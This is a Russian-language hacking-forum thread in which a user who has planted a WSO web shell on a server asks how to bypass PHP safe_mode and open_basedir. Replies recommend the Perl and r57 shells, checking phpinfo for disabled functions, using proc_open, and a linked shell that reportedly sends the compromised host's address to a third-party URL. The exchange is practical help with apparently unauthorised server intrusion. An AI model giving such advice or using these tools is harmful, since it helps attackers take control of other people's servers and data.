Привет ачатовцы! Проблема такая залил шелл (WSO), но на серваке safe_mod=on, open_basedir=on. То есть никакие команды я выполнить не могу, и листинг диры где я тоже не могу сделать. Я поискал, но ничего толкового не нашел. Может кто знает как обойти эти 2 опции? Если эта тема чем то не подходит по правилам, модеры хоть отпишите в личку за что?
Есть возможность, зависит от версии PHP. Но для начала попробуй PERL - шелл како-нибудь, может помочь. + в r57 от Elekt'a есть возможносьб обхода safe_mode и basedir
PHP 5.2.6. CentOS Linux 2.6.18-128.1.10 А с перловым и r57 я попробую, спасибо. Команды все, какую не введу ни одна не проходит...
Список отключенных команд можно взять из phpinfo. Если proc_open там не виднеется, то попробуй - https://forum.antichat.ru/thread114500.html
Попробуй этот шел. http://stashbox.org/823273/4e.txt У меня обход safe mod'a сработал. Только имей ввиду, что он отсылает данные на http://fx0.name/spec/index.php/pic.png?a=http://host/your_shell.php Так что используй на свой страх и риск.
